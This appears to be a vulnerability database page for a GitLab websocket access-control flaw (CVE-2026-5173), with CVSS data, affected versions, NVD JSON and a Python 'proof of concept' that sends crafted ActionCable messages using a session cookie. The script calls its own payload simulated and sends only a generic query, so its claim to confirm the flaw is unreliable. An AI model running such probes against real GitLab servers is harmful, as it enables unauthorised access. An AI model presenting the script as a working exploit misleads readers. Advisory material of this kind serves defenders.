CVE-2026-5173

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket connections due to improper access control.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* - VULNERABLE

GitLab CE/EE >= 16.9.6, < 18.8.9

GitLab CE/EE >= 18.9, < 18.9.5

GitLab CE/EE >= 18.10, < 18.10.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import asyncio
import websockets
import json

async def cve_2026_5173_poc(target_url, auth_token):
    """
    PoC for CVE-2026-5173: GitLab WebSocket Improper Access Control
    This script attempts to invoke unintended server-side methods.
    """
    # GitLab ActionCable WebSocket endpoint
    uri = f"wss://{target_url}/-/cable"
    headers = {
        "Cookie": f"_gitlab_session={auth_token}"
    }

    try:
        print(f"[+] Connecting to {uri}...")
        async with websockets.connect(uri, extra_headers=headers) as websocket:
            # Subscription command to a channel (example)
            subscribe_msg = {
                "command": "subscribe",
                "identifier": json.dumps({"channel": "GraphqlChannel"})
            }
            await websocket.send(json.dumps(subscribe_msg))
            print("[+] Subscription sent.")

            # Attempt to invoke an unintended method (Simulated payload)
            # In a real scenario, this would target specific exposed methods
            exploit_payload = {
                "command": "message",
                "identifier": json.dumps({"channel": "GraphqlChannel"}),
                "data": json.dumps({
                    "query": "query { currentUser { username } }", 
                    "variables": {},
                    "action": "execute"
                })
            }
            
            print(f"[*] Sending exploit payload: {exploit_payload}")
            await websocket.send(json.dumps(exploit_payload))

            response = await websocket.recv()
            print(f"[+] Server Response: {response}")
            
            if response:
                print("[!] Potential vulnerability confirmed if unauthorized data returned.")

    except Exception as e:
        print(f"[-] Error occurred: {e}")

# Usage: asyncio.run(cve_2026_5173_poc("gitlab.example.com", "valid_token"))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5173
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5173
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5173/
[4] VulDB https://vuldb.com/cve/CVE-2026-5173
[5] https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/588959

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5173", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:17:00.220", "lastModified": "2026-04-16T16:44:58.543", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9.6 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to invoke unintended server-side methods through websocket connections due to improper access control."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-749"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.9.6", "versionEndExcluding": "18.8.9", "matchCriteriaId": "4C2970CC-B6D7-43CB-9E8C-D7F50DD13BD6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "16.9.6", "versionEndExcluding": "18.8.9", "matchCriteriaId": "50442516-A352-4018-AC06-22242834A510"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "5C4D8A99-6E70-4D55-9ACF-FF2620F070E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "DBCB346F-0B28-458B-A453-29DA4B0E91FC"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/588959", "source": "[email protected]", "tags": ["Broken Link"]}]}}